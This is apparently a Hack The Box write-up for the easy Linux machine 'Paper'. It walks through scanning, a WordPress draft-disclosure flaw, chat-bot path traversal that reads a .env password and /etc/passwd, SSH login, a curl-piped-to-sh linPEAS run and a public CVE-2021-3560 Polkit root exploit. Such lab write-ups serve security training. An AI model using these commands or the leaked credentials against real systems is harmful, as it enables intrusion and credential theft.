HTB Paper Writeup
INFO
Machine IP = 10.10.11.143
OS = Linux
Level = Easy
Points = 20
SCANNING
- Nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Nmap 7.92 scan initiated Sun Mar 13 11:10:47 2022 as: nmap -sV -sC -oA /home/kali/Desktop/nmap/Paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
| tls-alpn:
|_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 11:11:22 2022 -- 1 IP address (1 host up) scanned in 34.86 seconds
ENUMERATION
- Ports:
1
2
3
4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
With port 80 we have only a simple static page.
- Gobuster:
1
gobuster dir -u http://10.10.11.143 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
After Gobuster No! usefull information.
By check the certificate over https site on port 443 we got nothing.
With checking the responce of headers with the port 80 we found a vhost [office.paper] let’s add this to /etc/hosts file.
1
echo "10.10.11.143 office.paper" >> /etc/hosts
Here with our new VHost office.paper by checking footer, theme, and Wappalyzer [a browser extension] we can confirm there’s a WordPress hosted with version 5.2.3 which is vulnerable for Unauthenticated View Private/Draft Posts.
And there’s a one comment which tell michael to remove the secret content in drafts ASAP.
But for reaching this drafts we need admin creads that we don’t have it yet.
For that we just need to add ?static=1 after the url.
1
http://office.paper/?static=1
The results we get a new secret that tell us about new vhost and registration url. let’s add the vhost in /etc/hosts file.
1
2
3
sudo nano /etc/hosts
10.10.11.143 office.paper chat.office.paper
Go to new VHost then registration url we get the registration form let’s register ourself. After login then click on general room.
In the chat there is recyclops bot that helps the user to list the sales directory with list command and with file command we can view the content inside the file.
I used the list and file command to get the content inside directory.
the list command list the directory of current path let’s try directory Path Traversal using ../
And we get the previous directory content. hubot directory looks interesting let’s check the content in that.
Got a .env file. .ENV file usually use to store secrets.
let’s check the content in that using file ../hubot/.env
And we got the username [recyclops] and password[Queenofblad3s!23].
Let’s back and check the user available in this machine using file ../../../etc/passwd and we found [dwight] have access to [/bin/bash]
USER FLAG
- Privilege Escalation [User]
So let’s do ssh with preview password and user dwight And we got the user.txt
1
[dwight@paper ~]$ cat user.txt
ROOT FLAG
let’s run linPEAS.
1
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
And we see this machine is vulnerable to CVE-2021-3560 that is Polkit or Pwnkit which allows unprivileged user to call privileged methods using DBus.
- Privilege Escalation [Root]
Let’s get this python script inside this machine and run this.
1
https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
1
2
$ chmod +x CVE-2021-3560.py
$ python3 CVE-2021-3560.py
maybe you need to run it multi times.
then we get the root.txt file.
1
[root@paper]# cat root.txt
Hi there 👋 Support me!
Life is an echo—what you send out comes back.